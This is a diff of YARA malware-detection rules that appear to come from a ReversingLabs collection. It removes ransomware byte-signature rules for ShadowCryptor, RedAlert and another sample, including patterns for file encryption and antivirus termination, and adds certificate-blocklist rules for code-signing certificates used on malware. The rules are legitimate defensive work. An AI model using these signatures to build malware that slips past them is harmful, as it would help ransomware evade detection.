-            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 0F B6 44 24 ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 05
-            ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 83 F9 ?? 0F 86 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 40
-            ?? 48 89 0C 24 48 89 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 83 F9 ??
-            0F 86 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 40 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ??
-            ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 0D ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 84 C9 0F 85
-            ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89 44
-            24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 04 24
-            48 8B 4C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 8D 05 ?? ??
-            ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B
-            4C 24 ?? 48 89 04 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ?? C3 48
-            8D 0D ?? ?? ?? ?? 48 89 0C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 0F 0B 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89 44 24 ?? 48 8D 05 ?? ??
-            ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? E9
-        }
-		$attach_to_server_64 = {
-            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
-            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ??
-            ?? ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 89
-            7C 24 ?? 84 07 0F 57 C0 48 83 C7 ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48
-            8B 6D ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 48
-            89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8D 0D ?? ?? ?? ?? 48 89 4C
-            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8D 0D
-            ?? ?? ?? ?? 48 89 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ??
-            48 89 04 24 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ??
-            ?? 48 8B 44 24 ?? 48 8B 48 ?? 48 8B 10 48 8B 58 ?? 48 8B 40 ?? 48 39 CB 0F 87 ?? ??
-            ?? ?? 48 29 D9 48 29 D8 48 85 C0 0F 84 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48 01 DA
-            48 89 54 24 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C
-            24 ?? 48 89 0C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B
-            48 ?? 48 8B 50 ?? 84 01 48 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 48 83 C1 ?? 48 89 4C 24
-            ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 48 8B 44
-            24 ?? 48 8B 48 ?? 48 8B 40 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44
-            24 ?? 48 8B 4C 24 ?? 48 89 04 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B
-            4C 24 ?? 48 8B 54 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 89
-            54 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 44 24 ?? 48 89 8C 24 ??
-            ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ?? C3 90 E8 ?? ?? ?? ?? 48 8B 6C
-            24 ?? 48 83 C4 ?? C3 31 DB E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? E9
-        }
-		$encrypt_file_64 = {
-            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
-            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89
-            44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 89 04 24 48
-            89 4C 24 ?? 48 89 54 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48
-            89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48
-            8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 89 1C 24 48 8B 5C 24 ?? 48 89 5C 24 ??
-            48 89 44 24 ?? 48 89 4C 24 ?? 48 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B 6C 24 ?? 48 83 C4 ?? C3 E8 ?? ?? ?? ?? E9
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xingning Dexin Network Technology Co., Ltd." and pe.signatures [ i ] . serial == "61:fe:6f:00:bd:79:68:42:10:53:40:50:ff:46:bc:92" and 1512000000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0323Cc4E38735B0E6Efba76Ea25C73B7 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "0f3889d5-fb57-5745-999e-7dff0ddf7ee9"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14260-L14276"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "48bda7f61c9705ae70add3940f10d65fc7f7a776cec91a244f0e5bde07303831"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $get_files_for_encryption_32 and $encrypt_file_32 and $attach_to_server_32 ) or ( $get_files_for_encryption_64 and $encrypt_file_64 and $attach_to_server_64 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xingning Dexin Network Technology Co., Ltd." and pe.signatures [ i ] . serial == "03:23:cc:4e:38:73:5b:0e:6e:fb:a7:6e:a2:5c:73:b7" and 1512000000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Shadowcryptor : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1F9Aca069Ac1B6Bfb0E14861Ec857Bf6 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects ShadowCryptor ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "983e8927-4829-540f-9697-886226fd54ce"
-		date = "2021-02-11"
-		modified = "2021-02-11"
+		id = "b78e3bc2-5b65-507a-9183-148f97baa3e8"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.ShadowCryptor.yara#L1-L89"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "875150db9fc36cd992988bba7d0c05487418b901980bf428ebd427c82fbcacd7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14278-L14294"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d7c9a471455768a00deeb73900bf80a98f0b2c9da1fd09d568e2998deaf404d2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "ShadowCryptor"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 0F 43 45 ?? 50 8D 85
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B
-            BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB ??
-            8D A4 24 ?? ?? ?? ?? 90 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 33 C0 83 7D
-            ?? ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 85
-            ?? ?? ?? ?? 83 F8 ?? 74 ?? A8 ?? 74 ?? 50 8D 85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? EB ?? 51 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 C7 ?? 83 D6 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
-            7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D6 8B C7 8B 4D ?? 64 89 0D ?? ??
-            ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$encrypt_files = {
-            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ??
-            33 C4 89 44 24 ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 44 24 ?? 64 A3 ?? ?? ?? ?? 8B
-            F1 8D 46 ?? 50 8D 4E ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ??
-            ?? ?? ?? 66 89 44 24 ?? 89 44 24 ?? 39 46 ?? 0F 84 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ??
-            80 7E ?? ?? 0F 85 ?? ?? ?? ?? 51 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 4E ?? E8 ?? ?? ??
-            ?? 8B C8 E8 ?? ?? ?? ?? 8B D0 8B 02 85 C0 74 ?? 8B 00 8B 48 ?? 8B 40 ?? 49 23 4A ??
-            8B 04 88 8D 4C 24 ?? 3B C8 74 ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 46 ?? 8B 4E ?? 48
-            03 C8 8B 46 ?? 48 23 C8 8B 46 ?? 8B 3C 88 83 7F ?? ?? 72 ?? FF 37 E8 ?? ?? ?? ?? 83
-            C4 ?? 33 C0 C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 66 89 07 FF 4E ?? 75 ?? 89 46
-            ?? 83 EC ?? 8B CC 6A ?? 89 41 ?? 33 C0 C7 41 ?? ?? ?? ?? ?? 50 66 89 01 8D 44 24 ??
-            50 E8 ?? ?? ?? ?? 51 8B CE E8 ?? ?? ?? ?? 8B C8 0B CA 74 ?? 01 46 ?? 11 56 ?? 83 7C
-            24 ?? ?? 8D 54 24 ?? 0F 43 54 24 ?? 83 EC ?? 8B FC 33 C0 C7 47 ?? ?? ?? ?? ?? C7 47
-            ?? ?? ?? ?? ?? 66 89 07 66 39 02 74 ?? 8B C2 8D 48 ?? 89 4C 24 ?? 66 8B 08 83 C0 ??
-            66 85 C9 75 ?? 2B 44 24 ?? D1 F8 50 52 8B CF E8 ?? ?? ?? ?? 8B 4E ?? 83 79 ?? ?? 8D
-            41 ?? 72 ?? 8B 00 8B 91 ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 09 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4C 24 ?? 33
-            CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$terminate_antivirus_processes_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 33 C0 C7 43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 66 89 03 89
-            45 ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-        }
-		$terminate_antivirus_processes_p2 = {
-            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 49 ?? 33 F6 8B BC B5 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 57 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 39 43 ?? 74 ?? 6A ?? 68 ??
-            ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 66 83 3F ?? 75 ?? 33 C0 EB ?? 8B C7 8D 50 ?? 8D 49 ??
-            66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 50 57 8B CB E8 ?? ?? ?? ?? 46 83 FE ??
-            72 ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 FF
-            15 ?? ?? ?? ?? 8B C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ??
-            ?? ?? ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "1f:9a:ca:06:9a:c1:b6:bf:b0:e1:48:61:ec:85:7b:f6" and 1477440000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_3E9D26Dcf703Ca3B140D7E7Ad48312E2 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "3ad650b2-45ea-5324-b8dc-b48094ae2376"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14296-L14312"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d8f70ba61509f3df34705bea0bfcb4cce3e92a33f0f1b65315d886eb5592f152"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $terminate_antivirus_processes_p* ) ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dong Qian" and pe.signatures [ i ] . serial == "3e:9d:26:dc:f7:03:ca:3b:14:0d:7e:7a:d4:83:12:e2" and 1440580240 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Ransomware_Redalert : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4E2523E76Ea455941E75Fb8240474A75 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects RedAlert ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ec7567bf-2c39-529f-ae93-74270a161827"
-		date = "2022-09-01"
-		modified = "2022-09-01"
+		id = "be5e6f35-6177-50bb-82ea-55628acda4c2"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Linux.Ransomware.RedAlert.yara#L1-L146"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fe0d10c2ef1dacdb5374f319e470274b91f4f171db49de8c89e8aaa9aa75a45c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14314-L14330"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e89f722345fda82fd894d34169d1463997ae1d567d46badbf3138faa04cf8fa4"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "RedAlert"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            41 57 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 74 24 ?? BE ?? ?? ?? ?? 48
-            89 54 24 ?? 48 89 4C 24 ?? 4C 89 44 24 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 C5 75 ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 89 C7 E8 ?? ?? ?? ?? 83 F8 ?? 89 C3 75 ?? BF ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 48 8D 54 24 ??
-            89 C6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C0 75 ?? BF ?? ?? ?? ?? EB ?? 4C 8B B4 24 ??
-            ?? ?? ?? 4D 85 F6 7F ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? EB ?? 49
-            81 FE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 97 44 24 ?? 49 81 FE ?? ?? ?? ?? 0F 97
-            44 24 ?? 80 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? 4C 89 F0 C7 44 24 ?? ?? ?? ?? ?? 48 89
-            D3 31 D2 48 F7 F3 48 6B C8 ?? 48 89 4C 24 ?? 49 81 FE ?? ?? ?? ?? 77 ?? 4D 89 F4 41
-            BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 41 BC ?? ?? ?? ?? 45 31 ED C7 44 24 ??
-            ?? ?? ?? ?? 4D 63 FD C7 44 24 ?? ?? ?? ?? ?? 4C 0F AF 7C 24 ?? E9 ?? ?? ?? ?? 80 7C
-            24 ?? ?? 74 ?? 45 85 ED 74 ?? 80 7C 24 ?? ?? 74 ?? 41 8D 45 ?? 3B 44 24 ?? 4C 89 FE
-            75 ?? 49 8D B6 ?? ?? ?? ?? EB ?? 31 F6 31 D2 48 89 EF E8 ?? ?? ?? ?? 48 63 7C 24 ??
-            48 89 E9 4C 89 E2 48 03 7C 24 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 39 E0 74 ?? BF ??
-            ?? ?? ?? EB ?? 44 01 64 24 ?? 41 FF C5 44 3B 6C 24 ?? 0F 85 ?? ?? ?? ?? 48 8D 9C 24
-            ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 84 C0 74 ?? BF ??
-            ?? ?? ?? EB ?? 48 8D BC 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 85 C0
-            74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 63 6C 24 ?? 45 89 E7 44 89 64 24 ?? 4C 0F AF
-            6C 24 ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B 4C 24 ?? 41 B8
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 84
-        }
-		$encrypt_files_p2 = {
-            C0 75 ?? 48 8B 54 24 ?? 48 8B 7C 24 ?? 48 89 E9 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7
-            15 ?? ?? ?? ?? 48 39 D0 75 ?? 48 8B 44 24 ?? 48 89 E9 BE ?? ?? ?? ?? 0F B7 50 ?? 48
-            8B 38 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F B7 51 ?? 48 39 D0 74 ?? BF ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 4C 03 7C 24 ?? 44 3B 6C 24 ?? 0F 8C ?? ?? ?? ?? E9
-            ?? ?? ?? ?? BF ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 80 7C
-            24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? 80 7C 24 ?? ?? 74 ?? 8B 44 24 ?? 4C 89 EE FF C0
-            3B 44 24 ?? 75 ?? 49 8D B6 ?? ?? ?? ?? EB ?? 31 F6 31 D2 48 89 EF E8 ?? ?? ?? ?? 48
-            63 44 24 ?? 48 8B 5C 24 ?? 48 8D B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 31 C9 31
-            D2 45 89 E1 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 01 C3 48 8D 84 24 ??
-            ?? ?? ?? 49 89 D8 48 89 1C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            48 89 E9 4C 89 E2 BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 39 E0 0F 85 ?? ?? ?? ??
-            FF 44 24 ?? 8B 54 24 ?? 8B 4C 24 ?? 01 54 24 ?? 39 4C 24 ?? 75 ?? 31 F6 BA ?? ?? ??
-            ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 E9 BA ?? ?? ?? ?? BE ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8A 5C 24 ?? 48 83 F8 ?? B0 ?? 0F 44 D8 44 3B 7C 24 ?? 88 5C 24
-            ?? 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 44 03 7C 24 ?? 4C 03 6C 24 ?? 8B 44 24 ?? 39
-            44 24 ?? 0F 8C ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 0F B6 44 24 ?? 48 81 C4 ?? ?? ??
-            ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
-        }
-		$find_files_p1 = {
-            41 57 FC 41 56 41 55 41 54 49 89 FC 55 53 48 83 EC ?? 48 8B 84 24 ?? ?? ?? ?? 48 89
-            4C 24 ?? 48 83 C9 ?? 48 89 74 24 ?? 4C 89 44 24 ?? 4C 89 4C 24 ?? 88 54 24 ?? 48 89
-            44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 44 8A BC 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24
-            ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 31 C0 F2 AE 4C 89
-            E7 48 F7 D1 4C 8D 71 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 85 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 48 83 C4 ?? 4C 89 E6 48 89 C2 5B 5D 41 5C 41 5D 41
-            5E 41 5F BF ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 45 84 FF 48 8D 6B ?? 74 ?? 0F B6 4B ??
-            48 89 EA 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 80 7B ?? ?? 0F 85 ?? ?? ?? ??
-            80 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84
-            ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BE ?? ??
-            ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FC 31 C0 48 83 C9 ?? 48 89 EF
-            F2 AE 4C 89 F0 48 29 C8 48 3B 44 24 ?? 76 ?? 48 8B 3D ?? ?? ?? ?? 48 89 E9 4C 89 E2
-            BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4B 8D 1C 34 48 89 EE 48 8D 7B ??
-            C6 03 ?? E8 ?? ?? ?? ?? 41 0F B6 C7 4C 8B 4C 24 ?? 4C 8B 44 24 ?? 89 44 24 ?? 48 8B
-            44 24 ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 74 24 ?? 4C 89 E7 48 89 44 24 ?? 48 8B
-        }
-		$find_files_p2 = {
-            44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 89 04 24 E8
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 45 84 FF 0F 85 ?? ?? ?? ?? FC 48 83 C9 ?? 48 89 EF 44 88
-            F8 F2 AE 48 8B 54 24 ?? 48 89 EF 48 89 CB 48 8B 4C 24 ?? 48 F7 D3 48 89 DE 4C 8D 6B
-            ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 48 89 EA 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ??
